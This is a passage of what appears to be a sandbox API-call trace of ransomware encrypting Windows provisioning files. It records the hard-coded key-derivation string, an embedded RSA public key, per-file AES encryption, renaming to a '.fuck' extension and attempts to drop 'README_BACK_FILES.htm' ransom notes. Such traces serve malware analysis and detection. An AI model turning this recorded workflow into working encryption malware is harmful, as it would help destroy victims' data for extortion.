lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.554] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.554] CryptDestroyKey (hKey=0x2845e60) returned 1 [0237.554] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.555] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.555] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.555] GetLastError () returned 0x5 [0237.555] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0237.555] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0237.555] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.556] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.556] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.556] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2844b28) returned 1 [0237.559] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.559] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.559] CryptHashData (hHash=0x2845d60, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.559] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2845d60, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28464e0) returned 1 [0237.559] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.559] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.559] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28456d8) returned 1 [0237.560] CryptImportPublicKeyInfo (in: hCryptProv=0x28456d8, dwCertEncodingType=0x1, pInfo=0x284f188*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f1b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f1c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2845e60) returned 1 [0237.560] CryptEncrypt (in: hKey=0x2845e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.560] CryptEncrypt (in: hKey=0x2845e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844ff0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2844ff0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.560] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844ff0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.560] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2763998, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.560] CryptEncrypt (in: hKey=0x28464e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763998*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2763998*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.560] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.560] CloseHandle (hObject=0xffffffff) returned 1 [0237.560] CloseHandle (hObject=0xffffffff) returned 1 [0237.560] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0237.561] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0237.561] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0237.561] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0237.562] CryptDestroyHash (hHash=0x2845d60) returned 1 [0237.562] CryptDestroyKey (hKey=0x28464e0) returned 1 [0237.562] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.562] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.562] FindClose (in: hFindFile=0x2846220 | out: hFindFile=0x2846220) returned 1 [0237.562] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.562] AreFileApisANSI () returned 1 [0237.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2844b28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.562] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.563] GetLastError () returned 0x5 [0237.563] GetLastError () returned 0x5 [0237.563] FindNextFileA (in: hFindFile=0x28460e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.563] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.563] GetLastError () returned 0x5 [0237.563] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml")) returned 0x20 [0237.563] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.563] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.564] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.564] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.564] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2844b28) returned 1 [0237.568] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.568] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.568] CryptHashData (hHash=0x2846160, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.568] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2846160, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28463e0) returned 1 [0237.568] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.568] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.568] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28453a8) returned 1 [0237.569] CryptImportPublicKeyInfo (in: hCryptProv=0x28453a8, dwCertEncodingType=0x1, pInfo=0x284ee48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284ee78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284ee80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28461a0) returned 1 [0237.569] CryptEncrypt (in: hKey=0x28461a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.569] CryptEncrypt (in: hKey=0x28461a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2845a08*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2845a08*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.569] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2845a08, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.570] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x2763998, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.570] CryptEncrypt (in: hKey=0x28463e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763998*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x2763998*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.570] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.570] CloseHandle (hObject=0xffffffff) returned 1 [0237.570] CloseHandle (hObject=0xffffffff) returned 1 [0237.570] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.570] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.570] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.gsg")) returned 0 [0237.571] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.fuck")) returned 0 [0237.571] CryptDestroyHash (hHash=0x2846160) returned 1 [0237.571] CryptDestroyKey (hKey=0x28463e0) returned 1 [0237.571] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.571] FindNextFileA (in: hFindFile=0x28460e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.571] FindClose (in: hFindFile=0x28460e0 | out: hFindFile=0x28460e0) returned 1 [0237.571] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.572] AreFileApisANSI () returned 1 [0237.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.572] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.572] GetLastError () returned 0x5 [0237.572] GetLastError () returned 0x5 [0237.572] FindNextFileA (in: hFindFile=0x2845fa0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.572] FindClose (in: hFindFile=0x2845fa0 | out: hFindFile=0x2845fa0) returned 1 [0237.572] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\readme_back_files.htm")) returned 0xffffffff [0237.572] AreFileApisANSI () returned 1 [0237.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.573] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.573] GetLastError () returned 0x5 [0237.573] GetLastError () returned 0x5 [0237.573] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.574] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845ea0 [0237.574] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.574] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.574] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.574] GetLastError () returned 0x5 [0237.574] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml")) returned 0x20 [0237.574] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.574] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.575] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.575] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.575] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844b28) returned 1 [0237.578] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.578] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.578] CryptHashData (hHash=0x28463e0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.578] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846460) returned 1 [0237.578] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.578] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.578] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2845b18) returned 1 [0237.578] CryptImportPublicKeyInfo (in: hCryptProv=0x2845b18, dwCertEncodingType=0x1, pInfo=0x2850438*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850468*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850470*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2845fa0) returned 1 [0237.578] CryptEncrypt (in: hKey=0x2845fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.578] CryptEncrypt (in: hKey=0x2845fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2845c28*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2845c28*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.579] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2845c28, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.579] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x276d6a0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.579] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276d6a0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x276d6a0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.579] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.579] CloseHandle (hObject=0xffffffff) returned 1 [0237.579] CloseHandle (hObject=0xffffffff) returned 1 [0237.579] CopyFileA 